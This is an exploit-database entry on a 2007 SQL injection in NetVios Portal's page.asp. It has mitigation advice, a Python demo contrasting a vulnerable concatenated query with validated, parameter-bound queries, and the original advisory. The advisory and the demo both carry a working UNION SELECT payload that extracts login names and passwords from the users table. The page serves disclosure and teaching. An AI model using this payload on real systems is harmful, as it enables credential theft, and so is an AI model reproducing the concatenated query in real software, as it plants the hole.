Vendor: NetVios Portal
By: parad0x
CVSS: N/A
Severity: HIGH
Type: Remote SQL Injection
CWE: 89
Product Name: NetVios Portal
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

NetVios Portal (page.asp) Remote SQL Injection Vulnerability

This vulnerability allows an attacker to inject SQL commands through the NewsID parameter of page.asp, potentially leading to unauthorized access to the database. The original advisory, reproduced below, includes an example request.

Mitigation:

To mitigate this vulnerability, ensure that all user input is properly validated and sanitized before being used in SQL queries. Additionally, consider using prepared statements or parameterized queries to prevent SQL injection attacks.
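
The two mitigations above, shown side by side as an added example (not code from NetVios or from the advisory). The product's ASP source is not on this page, so Python with an in-memory SQLite database stands in for it; the table layout, sample rows and function names are assumptions, and the only value taken from the page is the NewsID string in the advisory's example.

```python
import sqlite3

def make_db():
    """Constructed stand-in: an 8-column news table plus a users table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER, c1, c2, title, body, c5, c6, c7);
        CREATE TABLE users (userId INTEGER, loginname TEXT, password TEXT);
        INSERT INTO news VALUES (1, 0, 0, 'Launch', 'Welcome', 0, 0, 0);
        INSERT INTO users VALUES (1, 'admin', 'constructed-secret');
    """)
    return db

def fetch_news_concat(db, news_id):
    # Vulnerable pattern: the parameter is pasted into the SQL text,
    # so everything after the number is parsed as SQL.
    return db.execute("SELECT * FROM news WHERE id = " + news_id).fetchall()

def parse_news_id(raw):
    # Allow-list validation: NewsID must be 1 to 9 ASCII digits, nothing else.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("NewsID must be a positive integer")
    return int(raw)

def fetch_news_param(db, news_id):
    # Hardened: validate first, then bind the value with a placeholder.
    # A bound value is data only; the driver never parses it as SQL.
    return db.execute("SELECT * FROM news WHERE id = ?",
                      (parse_news_id(news_id),)).fetchall()

# NewsID value from the advisory's example request.
ADVISORY_VALUE = ("-1 union select 0,1,2,loginname,password,5,6,7 "
                  "from users where userId=1")

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", fetch_news_concat(db, ADVISORY_VALUE))
    print("legitimate  :", fetch_news_param(db, "1"))
    try:
        fetch_news_param(db, ADVISORY_VALUE)
    except ValueError as exc:
        print("rejected    :", exc)
```

With concatenation, the users row comes back in the news result set; with validation plus binding, the same value is rejected before any query runs.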
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  NetVios Portal (page.asp) Remote SQL Injection Vulnerability
# Author  :  parad0x
# Contact :  :(
# D.Page  :  http://www.scriptaty.net/netvios-portal.html
# $$      :  Free
# S.Page  :  http://www.netvios.com
*******************************************************************************
http://[target]/[path]/News/page.asp?NewsID=[SQL]

Example:

//News/page.asp?NewsID=-1 union select 0,1,2,loginname,password,5,6,7 from users where userId=1

"""""""""""""""""""""
greetz : VoLqaN, x-MastER

"""""""""""""""""""""

# milw0rm.com [2007-03-19]